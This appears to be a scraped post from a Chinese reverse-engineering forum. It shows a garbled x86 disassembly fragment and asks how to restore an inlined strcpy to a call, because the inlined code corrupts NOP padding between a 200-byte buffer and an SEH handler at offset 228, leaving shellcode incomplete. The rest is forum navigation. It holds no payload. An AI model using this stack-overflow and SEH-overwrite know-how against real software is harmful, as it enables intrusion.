&&&79&004010cc&8b4df0&&&&&&&&&&mov&&&&&ecx,dword&ptr&[ebp-10h]
&&&79&004010cf&00&&mov&&&&&dword&ptr&fs:[0],ecx
&&&79&&5f&&&&&&&&&&&&&&pop&&&&&edi
&&&79&&5e&&&&&&&&&&&&&&pop&&&&&esi
&&&79&&5b&&&&&&&&&&&&&&pop&&&&&ebx
&&&79&&8be5&&&&&&&&&&&&mov&&&&&esp,ebp
&&&79&004010db&5d&&&&&&&&&&&&&&pop&&&&&ebp
&&&79&004010dc&c3&&&&&&&&&&&&&&ret
但又碰到另一个问题:蓝色部分是&strcpy()&的部分。但这部分已转换为汇编指令组合(即将strcpy()用“简单汇编指令”编写了)。如果想要恢复原来调用&strcpy()&的样子(下面样子1)该如何?即:
mov&eax,&[ebp&-&addr_1]&&&&&&&&&//&参数2
mov&eax,&[ebp&-&addr_2]&&&&&&&&//&参数1
call&addr_strcpy&&&&&&&&&&&&&&&&&&&&&&//&调用&strcpy函数
1、事实上如果在linux上使用gdb反编译“类似”的程序,多半是“样子1”的模式(不是&蓝色部分代码)
2、之所以要这样做,是因为buff[]&只有200字节,而“异常回调函数”的位置在228,中间差了28字节。原本这28字节由0x90填充,但单步调试发现“上面蓝色部分代码”利用了这28字节中的一部分(估计是计数器之类,或临时信息存放),最终导致shellcode&不完整。
您不可以发表主题
您不可以回复帖子
您不可以上传附件
您不可以编辑自己的帖子
论坛论坛启用
用户控制面板
会员在线状态
『看雪众测/众包』
『Android 安全』
『Android 开发』
『iOS安全』
『求助问答』
『经典问答』
『资料导航』
『软件调试逆向』
『密码学』
『编程技术』
『C32Asm』
『MDebug』
『安全工具开发』
『加壳与脱壳』
『CrackMe&ReverseMe』
『资源下载』
『WEB安全』
『漏洞分析』
『外文翻译』
『招聘专区』
『职业生涯』
『15PB培训』
『麦洛克菲培训』
『茶余饭后』
『安全资讯』
『论坛活动』
6)PEDIY Crackme竞赛2009
7)看雪十周年专版
8)腾讯公司2010软件安全竞赛
9)2011 Exploit Me竞赛
『图书项目版』
《加密与解密(第三版)》
《C++反汇编与逆向分析技术揭秘》
《Android软件安全与逆向分析》
『论坛版务』
相似的主题
『编程技术』
所有时间均为北京时间, 现在的时间是 .
&&& 看雪学院()
| 提供带宽资源
|&微信公众帐号:

我要回帖

更多关于 androidstudio编译慢 的文章

 

随机推荐